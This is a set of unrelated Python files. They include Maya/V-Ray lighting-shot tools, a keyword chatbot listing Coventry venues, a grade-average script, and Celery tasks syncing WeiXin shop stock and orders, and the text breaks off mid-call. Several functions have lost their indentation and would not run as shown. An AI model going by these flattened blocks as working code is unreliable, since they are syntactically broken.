                om.MGlobal.displayInfo(s.format(splitDiff[2], splitDiff[1], splitDiff[0]))
                # NOTE(review): splitDiff[0] is a *string*; comparing it to
                # the int self._TIME_DIFFERENCE is not a numeric check (in
                # Python 2, str < int is always False, so this branch never
                # fires). Should this be int(splitDiff[0])? Confirm the
                # intended out-of-date rule before changing it.
                if splitDiff[0] < self._TIME_DIFFERENCE:
                    result = 'FAILED - Out Of Date'
                else:
                    result = 'Success'
            else:
                om.MGlobal.displayWarning('SEC = %s < BAD > ANIM = %s' % (secTime, animTime))
                result = 'FAILED - Out Of Date'
        else:
            result = 'FAILED - No Sec Files Yet'
        return result
        return result  # NOTE(review): unreachable duplicate return
def set_far_near_clip_settings(self, *args):
    """Apply the standard far/near clip planes to the persp camera and
    disable the V-Ray environment volume."""
    cmds.setAttr('perspShape.farClipPlane', self._FAR_CLIP)
    cmds.setAttr('perspShape.nearClipPlane', self._NEAR_CLIP)
    cmds.setAttr('vraySettings.cam_environmentVolumeOn', 0)

def reset_attributes(self, *args):
    """Reset validated attributes to factory settings from the show config."""
    lrc.reset_factory_settings(self._RESET_CONFIG)
def reference_xgen(self, *args):
    """
    Open the lighting dock and run the Xgen reference window when the show
    has Xgen.

    :param args: Button
    :return: status string saying whether Xgen exists on the show
    """
    try:
        light.menu.lightingDock.main()
        xgenReference.Window().run()
        xgenReference.Window().close()
        result = '- Xgen Exists'
    except Exception:
        # Narrowed from a bare ``except`` so SystemExit/KeyboardInterrupt
        # are no longer swallowed; any tool failure is treated as "no Xgen
        # on this show", matching the original behavior.
        result = '- No Xgen on show'
    return result
# Shot Light Modification -CAMERA ADJUSTMENTS-
def enable_camera_shake(self, *args):
    """Enable the overscan camera-shake setup via the lrc validator."""
    lrc.overscan()
    pm.scrollField(self.ui.printedInfo, text='Success - OverScan Setup', e=True)

def revert_camera_shake(self, *args):
    """Remove the overscan camera-shake setup."""
    lrc.re_overscan()
    pm.scrollField(self.ui.printedInfo, text='Success - Removed OverScan', e=True)
def enable_secondary_cam(self, *args):
    """
    Open the secondary-camera viewer; warn if no 3D viewport is active.
    :param args: Button
    :return: None
    """
    try:
        camera_sec_viewer.SecViewerTool().cameraSec_UI()
        pm.scrollField(self.ui.printedInfo, text='Success - Secondary Created', e=True)
    except Exception:
        # Narrowed from a bare ``except`` (which also caught SystemExit /
        # KeyboardInterrupt); any tool failure is reported as a missing
        # 3D viewport, matching the original behavior.
        cmds.warning('No 3D Viewport Selected')
def toggle_xgen(self, *args):
    """Toggle plugin-shape (Xgen) display in modelPanel4 and report the
    new state to the UI."""
    currently_on = cmds.modelEditor('modelPanel4', query=True, pluginShapes=True)
    cmds.modelEditor('modelPanel4', edit=True, pluginShapes=not currently_on)
    status = "OFF" if currently_on else "ON"
    pm.scrollField(self.ui.printedInfo, text="Success - Xgen Display " + status, e=True)
# Shot Light Modification -LIGHT ADJUSTMENTS-
def widen_rims_lights(self, *args):
    """Widen the character rim lights on the current layer."""
    rims_m.widen_rims_onlayer()
    pm.scrollField(self.ui.printedInfo, text='Success - Widden Rims', e=True)

def narrow_rims_lights(self, *args):
    """Narrow the character rim lights on the current layer."""
    rims_m.narrow_rims_onlayer()
    pm.scrollField(self.ui.printedInfo, text='Success - Narrow Rims', e=True)

def change_lights_post(self, *args):
    """Open the key-light fix (ReLight) UI for post light changes."""
    light_fix.ReLight().UI()
    pm.scrollField(self.ui.printedInfo, text='Success - Modifying Lights', e=True)
# TODO Clean this up
def add_light_to_pass(self, *arg):
    """
    Create a V-Ray light-select render element for each selected light,
    then tighten the DMC sampler settings on the current render layer.

    :param arg: Button
    :return: None
    """
    c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    render_layer_members = cmds.editRenderLayerMembers(c_render_layer, query=True)
    selfselect = cmds.ls(sl=True, dag=True, sn=True, v=True, type='transform')
    for l in selfselect:
        lgt = mel.eval('vrayAddRenderElement LightSelectElement')
        # rename light select pass to Lights
        # BUG FIX: the original called '...'.foramt(...) — a typo that
        # raised AttributeError on every invocation.
        ToLightWorld = cmds.rename(lgt, '{}_{}'.format(self._SHOW, 1))
        # name the light select after the light itself
        cmds.setAttr(ToLightWorld + ".vray_name_lightselect", l, type='string')
        # light-select type 0
        cmds.setAttr(ToLightWorld + ".vray_type_lightselect", 0)
        cmds.connectAttr(l + '.instObjGroups', ToLightWorld + '.dagSetMembers', f=True, na=True)
    cmds.select(clear=True)
    for each_member in render_layer_members:
        # NOTE(review): sets the same global sampler attrs once per member.
        cmds.setAttr("vraySettings.dmcThreshold", 0.004)
        cmds.editRenderLayerAdjustment("vraySettings.dmcThreshold")
        cmds.setAttr("vraySettings.dmcMaxSubdivs", 50)
    pm.scrollField(self.ui.printedInfo, text='Success - Added Light To Pass', e=True)
# TODO clean this up
def light_diffuse_spec(self, *arg):
    """
    For every selected light, create a pair of V-Ray light-select render
    elements (diffuse and specular), then tighten the DMC sampler settings
    for the current render layer.

    :param arg: Button
    :return: None
    """
    c_render_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    render_layer_members = cmds.editRenderLayerMembers(c_render_layer, query=True)
    selected_lights = cmds.ls(sl=True, dag=True, sn=True, v=True, type='transform')
    # (node-name suffix, light-select name suffix, vray_type_lightselect)
    variants = (('_Dif', '_Diffuse', 2), ('_Spec', '_Specular', 3))
    for light_node in selected_lights:
        for suffix, select_suffix, select_type in variants:
            # create a light select pass and rename it for this light
            element = mel.eval('vrayAddRenderElement LightSelectElement')
            renamed = cmds.rename(element, self._SHOW + light_node + suffix)
            cmds.setAttr(renamed + ".vray_name_lightselect", light_node + select_suffix, type='string')
            cmds.setAttr(renamed + ".vray_type_lightselect", select_type)
            cmds.connectAttr(light_node + '.instObjGroups', renamed + '.dagSetMembers', f=True, na=True)
    for _ in render_layer_members:
        # sets the same global sampler attrs once per member (as original)
        cmds.setAttr("vraySettings.dmcThreshold", 0.004)
        cmds.editRenderLayerAdjustment("vraySettings.dmcThreshold")
        cmds.setAttr("vraySettings.dmcMinSubdivs", 3)
        cmds.setAttr("vraySettings.dmcMaxSubdivs", 40)
    pm.scrollField(self.ui.printedInfo, text='Success - Added Light to Diffuse', e=True)
# Shot Creations -LAYER CREATION-
def set_checker(self, *args):
if self._SHOW == 'DTX':
universal_set_fixer.LayerQuery().layerChecker()
if self._SHOW == 'WDS':
MazeCavesFxSetup.run()
pm.scrollField(self.ui.printedInfo, text='Success - Ran Set Checker', e=True)
def set_selection(self, *args):
    """Launch the prop-set selection tool and report success in the UI."""
    prop_set.SetSelectionTool().main()
    pm.scrollField(self.ui.printedInfo, text="Success - Launch Set Selection", e=True)
def set_selection_tool_box(self, *args):
    """Open the prop-set tool-box UI and report success in the UI."""
    tool_box_m.PropSet().prop_ui()
    pm.scrollField(self.ui.printedInfo, text="Success - Launch Tool Box", e=True)
def auto_layer(self, *args):
    """Generate render layers from the current selection via the auto-layer
    tool, then report success in the UI."""
    auto_layer_m.AutoLayerTool().querySel()
    pm.scrollField(self.ui.printedInfo, text="Success - Layer Generation", e=True)
def prop_lighting_tool(self, *args):
    """Open the prop-lighting UI and report success in the UI."""
    bd_prop_lightingUI.main()
    pm.scrollField(self.ui.printedInfo, text="Success - Prop Light", e=True)
def interactive_lighting_tool(self, *args):
    """Open the interactive-light creator UI and report success in the UI."""
    creator_m.InteractiveLight().input_UI()
    pm.scrollField(self.ui.printedInfo, text="Success - Interactive Light", e=True)
def matte_layer(self, *args):
    """Open a small window that asks for a layer name; its Execute button
    calls create_matte_layer() to build the matte layer from the selection."""
    # Rebuild the window from scratch if it is already open.
    if cmds.window("matte_layer_name", query=True, exists=True):
        cmds.deleteUI("matte_layer_name")
    cmds.window("matte_layer_name", title="Create Matte Layer",
                sizeable=False, mnb=False, mxb=False)
    cmds.columnLayout(adjustableColumn=True)
    cmds.text(label='Select All Objects You Want Included in Layer', h=30)
    cmds.textFieldButtonGrp('layer_name', label='Layer Name:', h=30, cw=[1, 60],
                            text='Layer Name', buttonLabel='Execute',
                            bc=lambda *x: self.create_matte_layer())
    cmds.window("matte_layer_name", edit=True, width=100, height=80)
    cmds.showWindow()
    pm.scrollField(self.ui.printedInfo, text="Success - Matte Layer", e=True)
def create_matte_layer(self, *args):
    """Create a matte render layer named after the UI text field, add the
    current selection to it, then close the naming window."""
    selection = cmds.ls(selection=True)
    layer_name = cmds.textFieldButtonGrp('layer_name', query=True, text=True)
    auto_layer_core_m.Matte().scene_matte_create('{}'.format(layer_name))
    current_layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    for node in selection:
        cmds.editRenderLayerMembers(current_layer, node, nr=True)
    # Tidy up: dismiss the naming window if it is still open.
    if cmds.window("matte_layer_name", query=True, exists=True):
        cmds.deleteUI("matte_layer_name")
def red_matte(self, *args):
    """Assign a red RGB matte shader to the current selection on the active
    render layer and report success in the UI."""
    layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    picked = cmds.ls(sl=True)
    auto_layer_core_m.Matte().create_RGB_shader('Red')
    auto_layer_core_m.Matte().assign_shaders(redList=picked, greenList=None,
                                             blueList=None, holdOutList=None,
                                             renderLayer=layer)
    pm.scrollField(self.ui.printedInfo, text="Success - Red Matte", e=True)
def green_matte(self, *args):
    """Assign a green RGB matte shader to the current selection on the active
    render layer and report success in the UI."""
    layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    picked = cmds.ls(sl=True)
    auto_layer_core_m.Matte().create_RGB_shader('Green')
    auto_layer_core_m.Matte().assign_shaders(redList=None, greenList=picked,
                                             blueList=None, holdOutList=None,
                                             renderLayer=layer)
    pm.scrollField(self.ui.printedInfo, text="Success - Green Matte", e=True)
def blue_matte(self, *args):
    """Assign a blue RGB matte shader to the current selection on the active
    render layer and report success in the UI."""
    layer = cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    picked = cmds.ls(sl=True)
    auto_layer_core_m.Matte().create_RGB_shader('Blue')
    auto_layer_core_m.Matte().assign_shaders(redList=None, greenList=None,
                                             blueList=picked, holdOutList=None,
                                             renderLayer=layer)
    pm.scrollField(self.ui.printedInfo, text="Success - Blue Matte", e=True)
def hold_out_matte(self, *args):
    """Rewire every selected geometry's shading engines to the Holdout matte
    shader, tag them with a V-Ray material-id attribute, and report success.
    """
    selection = cmds.ls(sl=True)
    auto_layer_core_m.Matte().create_holdout_shader()
    color = 'Holdout'
    cmds.select(selection)
    geoList = cmds.ls(dag=1, o=1, s=1, sl=1)
    for geo in geoList:
        try:
            geoSG = cmds.listConnections(geo, type='shadingEngine')
            for each in geoSG:
                shaders = cmds.ls(cmds.listConnections(each), materials=1)
                cmds.editRenderLayerAdjustment("{}.surfaceShader".format(each))
                cmds.disconnectAttr("{}.outColor".format(shaders[0]),
                                    "{}.surfaceShader".format(each))
                # BUG FIX: was "{}.surfaceShader".fromat(each) — the typo
                # raised AttributeError, which the bare except silently ate,
                # so the holdout shader was never connected.
                cmds.connectAttr("{}_Matte_Shader.outColor".format(color),
                                 "{}.surfaceShader".format(each))
                cmds.select(each, noExpand=True, replace=True)
                matteName = cmds.ls(selection=True)[0]
                pm.mel.eval('vray addAttributesFromGroup ' + matteName + ' vray_material_id 1;')
                cmds.editRenderLayerAdjustment("{}.vrayColorId".format(each))
        except Exception:
            # Best effort per object: skip geometry whose shading network
            # cannot be rewired (e.g. no shadingEngine connections).
            pass
    pm.scrollField(self.ui.printedInfo, text="Success - Hold Out", e=True)
def shader_material_id(self, color):
    """Tag the shaders of the selected objects with a V-Ray color ID.

    Parameters
    ----------
    color : str
        A string containing 'Red', 'Green', 'Blue' or 'Hold' (matched by
        substring, as the original did) selecting the vrayColorId value.
    """
    print(color)
    # Gather every surface shader feeding the selection's shading engines.
    list_of_shaders = list()
    for each_node in pm.ls(selection=True):
        try:
            child_nodes = each_node.listRelatives(ni=True)
        except Exception:
            continue
        for each_child_node in child_nodes:
            shading_engine = each_child_node.shadingGroups()
            for each_shading_engine in shading_engine:
                connections = pm.listConnections(each_shading_engine + '.surfaceShader')
                list_of_shaders.extend(connections)
    mat_name = "Material_ID"
    for Shader in list_of_shaders:
        # BUG FIX: the original did `if objExists: pass` and then queried
        # '.enabled' unconditionally, which raised when the element did not
        # exist yet. Re-enable an existing element, otherwise create it.
        if cmds.objExists(mat_name):
            if cmds.getAttr(mat_name + '.enabled') is False:
                cmds.editRenderLayerAdjustment(mat_name + '.enabled')
                cmds.setAttr(mat_name + '.enabled', True)
        else:
            Matid = mel.eval('vrayAddRenderElement materialIDChannel;')
            # Rename the Material ID element and point it at its own file.
            NewID = cmds.rename(Matid, mat_name)
            cmds.setAttr(NewID + '.vray_filename_mtlid', mat_name, type='string')
        mel.eval('vray addAttributesFromGroup ' + Shader + ' vray_material_id 1;')
        if 'Red' in color:
            cmds.setAttr(Shader + ".vrayColorId", 1, 0, 0,
                         type="double3")
        if 'Green' in color:
            cmds.setAttr(Shader + ".vrayColorId", 0, 1, 0,
                         type="double3")
        if 'Blue' in color:
            cmds.setAttr(Shader + ".vrayColorId", 0, 0, 1,
                         type="double3")
        if 'Hold' in color:
            cmds.setAttr(Shader + ".vrayColorId", 0, 0, 0,
                         type="double3")
    pm.scrollField(self.ui.printedInfo, text="Success - Mat ID", e=True)
# Shot General -GENERAL TOOLS-
def gi_bake_tool(self, *args):
    """Run the GI bake tool's render-layer output query and report success."""
    gi_bake.GIBakeTool().renderLayerOutPutQuery()
    pm.scrollField(self.ui.printedInfo, text="Success - GI Bake", e=True)
def propagate_lighting_tool(self, *args):
    """Open the shot-propagation UI and report success in the UI."""
    shot_prop.PropagatorTool().shotProp_UI()
    pm.scrollField(self.ui.printedInfo, text="Success - Propagator", e=True)
def shader_adjustment_tool(self, *args):
    """Open the shader-subdivision adjustment UI and report success."""
    shader_m.ShaderSubdiv().UI()
    pm.scrollField(self.ui.printedInfo, text="Success - Shader Adjustments", e=True)
def dock_control_tool(self, *args):
    """Open the dock-control UI and report success in the UI."""
    dock_m.DockControl().UI()
    pm.scrollField(self.ui.printedInfo, text="Success - Dock Control", e=True)
# Shot Completion -POST PROCES ACTIONS
def fix_tx(self, *args):
    """Swap texture file paths over to their .tx counterparts."""
    tx_fix.ForcePath().texture_path_swap('.tx')
def episode_constant_tools(self):
    """Load the episode constant-tools module from its network path, run its
    constant_tool_execute(), and return whatever it reports."""
    # import wds_tools.lrc.episodic_tools.Episode_Constant_Tools as ep_cons
    # ep_cons.constant_tool_execute()
    path_to_code = 'B:\\artists\\current\\src\\wds_tools\\lrc\\episodic_tools\\Episode_Constant_Tools.py'
    print(path_to_code)
    # imp.load_source executes the file as a throwaway module on every call.
    n = imp.load_source('tempName', path_to_code)
    info = n.constant_tool_execute()
    return info
def run_episode_tool(self, *args):
curr = cmds.file(q=True, sn=True)
if len(curr.split('/')) > 7:
ep = curr.split('/')[7]
path_to_code = self._EP_TOOLS + ep + '_Tools.py'
try:
if path_to_code:
print(path_to_code)
n = imp.load_source('tempName', path_to_code)
info = n.combo_execute()
return info
else:
print "path not found"
except:
print "no tools for this episode"
else:
cmds.warning('Not a DW Lighting Shot')
def filename_underscore_fix(self, *args):
    """Ensure the V-Ray file name prefix ends with a trailing underscore."""
    prefix_name = cmds.getAttr('vraySettings.fileNamePrefix')
    # BUG FIX: getAttr returns None when no prefix has ever been set, and the
    # original then crashed on .endswith(); guard against the empty case.
    if prefix_name and not prefix_name.endswith('_'):
        cmds.setAttr('vraySettings.fileNamePrefix', prefix_name + '_', type='string')
def disable_elements_layer(self, *arg):
    """Switch to the master render layer and disable every V-Ray render
    element and element set in the scene."""
    # NOTE(review): this query's result is discarded — looks like a leftover.
    cmds.editRenderLayerGlobals(query=True, currentRenderLayer=True)
    all_render_elements = cmds.ls(type="VRayRenderElement")
    all_render_elements_set = cmds.ls(type="VRayRenderElementSet")
    # Disable on the default layer so per-layer overrides are untouched.
    cmds.editRenderLayerGlobals(crl="defaultRenderLayer")
    for each in all_render_elements + all_render_elements_set:
        cmds.setAttr(each + ".enabled", 0)
def remove_plugin(self, *args):
    """Strip unknown plug-in requirements from the scene, reporting any that
    Maya refuses to remove."""
    # The query returns None when the scene has no unknown plug-ins.
    for plugin in cmds.unknownPlugin(q=True, l=True) or []:
        try:
            cmds.unknownPlugin(plugin, remove=True)
        except RuntimeError:
            print("Error Cant Remove!\n Plugin: {}".format(plugin))
def light_tweaker(self, *args):
    """Run the eye-spec light tweaker."""
    spec.run()
    # tweak_m.run_light_tweaker(offsetkey=False, placefill=False, setrims=False, eyespecs=True)
def world_pref_element(self, *args):
    """Create the world-position reference element by assigning a texture
    reference object."""
    world_pref.CreateWorldPref().assign_texture_ref_object()
# SUBMIT SHOT TO DEALINE
def submit(self, *args):
    """Submit the current scene to Deadline; for a v001 lighting file, prompt
    the artist to increment-save first instead of submitting."""
    mayaPath = cmds.file(q=True, sceneName=True)
    sceneInfo = SceneInfo(mayaPath)
    fileName = sceneInfo.get_file_name()
    if 'Lgt_v001' not in str(fileName):
        # Lighten the viewport before submission: bounding boxes only, then
        # re-enable just meshes and lights.
        cmds.modelEditor('modelPanel4', e=True,
                         displayAppearance='boundingBox')
        cmds.modelEditor('modelPanel4', e=True, allObjects=0)
        cmds.modelEditor('modelPanel4', e=True, polymeshes=True)
        cmds.modelEditor('modelPanel4', e=True, lights=True)
        app = farm.bd_deadline_submitter.DeadlineSubmitter()
        app.run()
        pm.scrollField(self.ui.printedInfo, text="Success - Submit Deadline", e=True)
    else:
        # Guard against farming an unversioned first save.
        prompt = cmds.confirmDialog(title='Version Control',
                                    message='Your working on Version 001! Press OK to Increment Before Submitting',
                                    button=['OK'], defaultButton='Yes',
                                    cancelButton='No',
                                    dismissString='No')
        if str(prompt) == 'OK':
            self.increment_save()
|
userinput = raw_input("welcome to the chatbot... ") #this input will be changed once integrated with other code
shopsDict = ['Wilkinsons', 'SPAR', 'Boots', 'Marks & Spencers' ]
clothingDict = ['Topshop', 'Topman', 'H&M', 'Riverisland', 'Debenhams', 'JD', 'Sportsdirect', 'Footlocker', 'Primark', 'Newlook' ]
upcomingGamesDict = ['Call of Duty WWII', 'Star Wars Battlefront II', 'Far Cry 5', 'Dragon Ball FighterZ' ]
eventsDict = ['Christmas lights_switch_on', 'Farmers market', 'CAIF peace concert', 'Christmas fair' ]
cinemaDict = ['Paddington 2', 'Thor Ragnarok', 'Jigsaw', 'Murder on the orient express', 'A bad moms christmas', 'Dispicable me 3']
clubbingDict = ['Kabash', 'Scholars', 'Rainbows', 'Catchtwentytwo', 'ClubM', 'DaddyCools', 'JJ', 'Rileys sports bar' ]
#Lists which allow for all the data to be stored allowing us to see what is avaliable in coventry
#if statments are used to be able to compare user information
if any(drink in userinput for drink in ("drinking", "club", "bar")):
print "The following are clubs in the Coventry area... "+ ', '.join(clubbingDict)
elif any(shop in userinput for shop in ("shop", "shopping","shops", "store", "stores")):
print "The following are shops in the Coventry area... "+ ', '.join(shopsDict)
elif any(clothe in userinput for clothe in ("clothing", "clothe", "shoe")):
print "The following are clothing stores in the Coventry area... "+ ', '.join(clothingDict)
elif any(games in userinput for games in ("games", "game", "gaming", "video games")):
print "The following are upcoming games... "+ ', '.join(upcomingGamesDict)
elif any(event in userinput for event in ("event", "events", "upcoming")):
print "The following are events in the Coventry area... "+ ', '.join(eventsDict)
elif any(movie in userinput for movie in ("film", "films", "cinema", "movie")):
print "The following are films showing in the Coventry area... "+ ', '.join(cinemaDict)
#These if statments will give the user an output of a list of all of the information as an output
else:
print "I'm sorry I don't know what you said"
#this shows the alternative output making it clear to the user that it does not understand the input
|
# Reads two grades and prints their average with one decimal place.
n1 = int(input('Digite a nota 1: '))
n2 = int(input('Digite a nota 2: '))
media = (n1 + n2) / 2
print('A média das notas {} e {} é {:.1f}'.format(n1, n2, media))
|
#-*- coding:utf8 -*-
import time
import datetime
import json
from celery.task import task
from celery.task.sets import subtask
from django.conf import settings
from common.utils import update_model_fields, replace_utf8mb4
from .models import WeiXinUser,WXOrder,WXProduct,WXProductSku,WXLogistic,WeixinUnionID
from .service import WxShopService
from .weixin_apis import WeiXinAPI,WeiXinRequestException
from shopback.items.models import Product,ItemNumTaskLog
import logging
logger = logging.getLogger('celery.handler')
def update_weixin_productstock():
    """Push local SKU stock counts to the WeiXin shop for products whose sale
    date was yesterday, logging every sync in ItemNumTaskLog.
    """
    # On-shelf products (shelf_status=1) that went on sale yesterday.
    products = Product.objects.filter(shelf_status=1,sale_time=datetime.date.today()-datetime.timedelta(days=1))
    wx_api = WeiXinAPI()
    cnt = 0  # NOTE(review): counter is never read — debug leftover?
    for product in products[18:]:  # NOTE(review): magic slice skips the first 18 — confirm intent
        cnt += 1
        wx_skus = WXProductSku.objects.filter(outer_id=product.outer_id).order_by('-modified')
        if wx_skus.count() > 0:
            try:
                # Refresh the cached WeiXin product for the newest SKU.
                wx_pid = wx_skus[0].product_id
                WXProduct.objects.getOrCreate(wx_pid,force_update=True)
            except Exception,exc:
                logger.error(exc.message,exc_info=True)
                continue
        for sku in product.pskus:
            outer_id = product.outer_id
            outer_sku_id = sku.outer_id
            # Sellable stock = remaining minus those waiting to ship, floored at 0.
            sync_num = sku.remain_num - sku.wait_post_num
            if sync_num < 0 :
                sync_num = 0
            try:
                wx_skus = WXProductSku.objects.filter(outer_id=outer_id,
                                                      outer_sku_id=outer_sku_id)
                for wx_sku in wx_skus:
                    # Delta between the desired and current WeiXin stock.
                    vector_num = sync_num - wx_sku.sku_num
                    if vector_num == 0:continue
                    if vector_num > 0:
                        wx_api.addMerchantStock(wx_sku.product_id,
                                                vector_num,
                                                sku_info=wx_sku.sku_id)
                    else:
                        wx_api.reduceMerchantStock(wx_sku.product_id,
                                                   abs(vector_num),
                                                   sku_info=wx_sku.sku_id)
                    ItemNumTaskLog.objects.get_or_create(user_id=7,
                                                         outer_id=outer_id,
                                                         sku_outer_id='wx%s'%outer_sku_id,
                                                         num=sync_num,
                                                         end_at=datetime.datetime.now())
            except Exception,exc:
                logger.error(exc.message,exc_info=True)
@task(max_retry=3,default_retry_delay=60)
def task_Update_Weixin_Userinfo(openId,unionId=None):
    """Fetch a follower's profile from the WeiXin API and persist it on the
    local WeiXinUser row; also record the openid/unionid pairing.

    Retries (up to max_retry) on any failure.
    """
    try:
        _wx_api = WeiXinAPI()
        userinfo = _wx_api.getUserInfo(openId)
        wx_user,state = WeiXinUser.objects.get_or_create(openid=openId)
        pre_subscribe_time = wx_user.subscribe_time
        pre_nickname = wx_user.nickname
        # Copy every API field we model, preferring non-empty new values.
        for k, v in userinfo.iteritems():
            if hasattr(wx_user, k) :
                setattr(wx_user, k, v or getattr(wx_user, k))
        # Keep an existing nickname; otherwise strip 4-byte UTF-8 (emoji)
        # so the value fits a utf8 (3-byte) MySQL column.
        wx_user.nickname = pre_nickname or replace_utf8mb4(wx_user.nickname.decode('utf8'))
        wx_user.unionid = wx_user.unionid or unionId or ''
        subscribe_time = userinfo.get('subscribe_time', None)
        if subscribe_time:
            # Prefer the previously stored subscribe time when present.
            wx_user.subscribe_time = pre_subscribe_time or datetime.datetime\
                .fromtimestamp(int(subscribe_time))
        key_list = ['openid','sex','language','headimgurl','country','province','nickname','unionid','subscribe_time','sceneid']
        update_model_fields(wx_user,update_fields=key_list)
        if not wx_user.unionid:
            return
        # Map this app's openid to the cross-app unionid.
        app_key = _wx_api._wx_account.app_id
        WeixinUnionID.objects.get_or_create(openid=openId,app_key=app_key,unionid=wx_user.unionid)
    except Exception, exc:
        raise task_Update_Weixin_Userinfo.retry(exc=exc)
@task(max_retry=3,default_retry_delay=60)
def task_Mod_Merchant_Product_Status(outer_ids,status):
    """Toggle the WeiXin shop shelf status for the given outer ids and mirror
    the new shelf state onto the local Product rows.

    Retries on WeiXinRequestException.
    """
    from shopback.items.models import Product
    from shopback import signals
    update_wxpids = set([])  # WeiXin product ids already toggled this run
    _wx_api = WeiXinAPI()
    try:
        for outer_id in outer_ids:
            wx_skus = WXProductSku.objects.filter(outer_id=outer_id).values('product').distinct()
            wx_prodids = [p['product'] for p in wx_skus]
            wx_prods = WXProduct.objects.filter(product_id__in=wx_prodids).order_by('-modified')
            if wx_prods.count() == 0 :
                continue
            # The most recently modified WeiXin product wins.
            wx_product = wx_prods[0]
            wxproduct_id = wx_product.product_id
            if wxproduct_id not in update_wxpids:
                update_wxpids.add(wxproduct_id)
                _wx_api.modMerchantProductStatus(wxproduct_id, status)
            product = Product.objects.get(outer_id=outer_id)
            if status == WXProduct.UP_ACTION:
                product.shelf_status = Product.UP_SHELF
                # broadcast the product up-shelf signal
                signals.signal_product_upshelf.send(sender=Product,product_list=[product])
            else:
                product.shelf_status = Product.DOWN_SHELF
            product.save()
    except WeiXinRequestException, exc:
        raise task_Mod_Merchant_Product_Status.retry(exc=exc)
@task
def pullWXProductTask():
    """Pull all on-sale (status 0) products from the WeiXin merchant API,
    upsert them locally, and mark everything else as down-shelf."""
    api = WeiXinAPI()
    on_shelf_ids = []
    for item in api.getMerchantByStatus(0):
        WXProduct.objects.createByDict(item)
        on_shelf_ids.append(item['product_id'])
    # Anything not returned by the API is no longer on sale.
    WXProduct.objects.exclude(product_id__in=on_shelf_ids)\
        .update(status=WXProduct.DOWN_SHELF)
@task
def pullWaitPostWXOrderTask(begintime,endtime,full_update=False):
    """Pull WeiXin orders in post-payment states and merge them into local
    trades, then advance the account's last order-sync timestamp.

    When begintime is falsy, the window starts 6 hours before the previous
    sync point (overlap cushion); full_update drops the window entirely.
    """
    update_status=[#WXOrder.WX_WAIT_PAY,
                   WXOrder.WX_WAIT_SEND,
                   WXOrder.WX_WAIT_CONFIRM,
                   WXOrder.WX_FINISHED]
    _wx_api = WeiXinAPI()
    if not begintime and _wx_api._wx_account.order_updated:
        begintime = int(time.mktime((_wx_api._wx_account.order_updated - datetime.timedelta(seconds=6*60*60)).timetuple()))
    dt = datetime.datetime.now()
    endtime = endtime and endtime or int(time.mktime(dt.timetuple()))
    if full_update:
        # Full update: no time window, fetch everything.
        begintime = None
        endtime = None
    for status in update_status:
        orders = _wx_api.getOrderByFilter(status=status,begintime=begintime,endtime=endtime)
        for order_dict in orders:
            order = WxShopService.createTradeByDict(_wx_api._wx_account.account_id, order_dict)
            WxShopService.createMergeTrade(order)
    _wx_api._wx_account.changeOrderUpdated(dt)
@task
def pullFeedBackWXOrderTask(begintime, endtime):
    """Pull WeiXin orders in the feedback (refund) state, merge them into
    local trades, and advance the account's refund-sync timestamp."""
    api = WeiXinAPI()
    account = api._wx_account
    # Default the window start to the previous refund sync point.
    if not begintime and account.refund_updated:
        begintime = int(time.mktime(account.refund_updated.timetuple()))
    now = datetime.datetime.now()
    if not endtime:
        endtime = int(time.mktime(now.timetuple()))
    for order_dict in api.getOrderByFilter(WXOrder.WX_FEEDBACK, begintime, endtime):
        order = WxShopService.createTradeByDict(account.account_id,
                                                order_dict)
        WxShopService.createMergeTrade(order)
    account.changeRefundUpdated(now)
@task
def syncStockByWxShopTask(wx_product):
    """Synchronize one WeiXin product's per-SKU stock with local inventory.

    Accepts either a WXProduct instance or its product_id. For every SKU the
    target stock is (quantity - waiting-to-post - reserved), then scaled by
    the shop user's stock percentage or, near the warn level, by yesterday's
    order share; the delta is pushed via add/reduceMerchantStock and logged.
    """
    from shopback.items.models import Product,ProductSku,ItemNumTaskLog
    from shopback.trades.models import MergeOrder
    from shopback.users.models import User
    if not isinstance(wx_product,WXProduct):
        wx_product = WXProduct.objects.get(product_id=wx_product)
    if not wx_product.sync_stock:
        return
    wx_api = WeiXinAPI()
    wx_openid = wx_api.getAccountId()
    wx_user = User.objects.get(visitor_id=wx_openid)
    user_percent = wx_user.stock_percent
    skus = wx_product.sku_list or []
    for sku in skus:
        if not sku.get('product_code',None):
            continue
        try:
            outer_id,outer_sku_id = Product.objects.trancecode('',
                                                               sku['product_code'],
                                                               sku_code_prior=True)
            # Flash-sale items are not stock-synced for now.
            if outer_id.startswith(('1','8','9')) and len(outer_id) >= 9:
                continue
            product = Product.objects.get(outer_id=outer_id)
            product_sku = ProductSku.objects.get(outer_id=outer_sku_id,
                                                 product__outer_id=outer_id)
        except:
            continue
        if not (wx_user.sync_stock and product.sync_stock and product_sku.sync_stock):
            continue
        wait_nums = (product_sku.wait_post_num>0 and
                     product_sku.wait_post_num or 0)
        remain_nums = product_sku.remain_num or 0
        real_num = product_sku.quantity
        sync_num = real_num - wait_nums - remain_nums
        # Scale the computed stock before comparing with the online quantity.
        if sync_num>0 and user_percent>0:
            sync_num = int(user_percent*sync_num)
        elif sync_num >0 and sync_num <= product_sku.warn_num:
            # Near the warn level: split the remaining stock by this shop's
            # share of yesterday's orders for the SKU.
            total_num,user_order_num = MergeOrder.get_yesterday_orders_totalnum(wx_user.id,
                                                                                outer_id,
                                                                                outer_sku_id)
            if total_num>0 and user_order_num>0:
                sync_num = int(float(user_order_num)/float(total_num)*sync_num)
            else:
                sync_num = (real_num - wait_nums)>10 and 2 or 0
        elif sync_num > 0:
            product_sku.is_assign = False
            update_model_fields(product_sku,update_fields=['is_assign'])
        else:
            sync_num = 0
        # # For product 3116BG7: test low-stock promotion effect online
        # if product.outer_id == '3116BG7':
        #     sync_num = product_sku.warn_num > 0 and min(sync_num,product_sku.warn_num+10) or min(sync_num,15)
        #
        if product_sku.is_assign:
            sync_num = 0
        # Only push when the target differs from the online quantity.
        if (sync_num != sku['quantity']):
            vector_num = sync_num - sku['quantity']
            if vector_num > 0:
                wx_api.addMerchantStock(wx_product.product_id,
                                        vector_num,
                                        sku_info=sku['sku_id'])
            else:
                wx_api.reduceMerchantStock(wx_product.product_id,
                                           abs(vector_num),
                                           sku_info=sku['sku_id'])
            ItemNumTaskLog.objects.get_or_create(user_id=wx_user.user.id,
                                                 outer_id=outer_id,
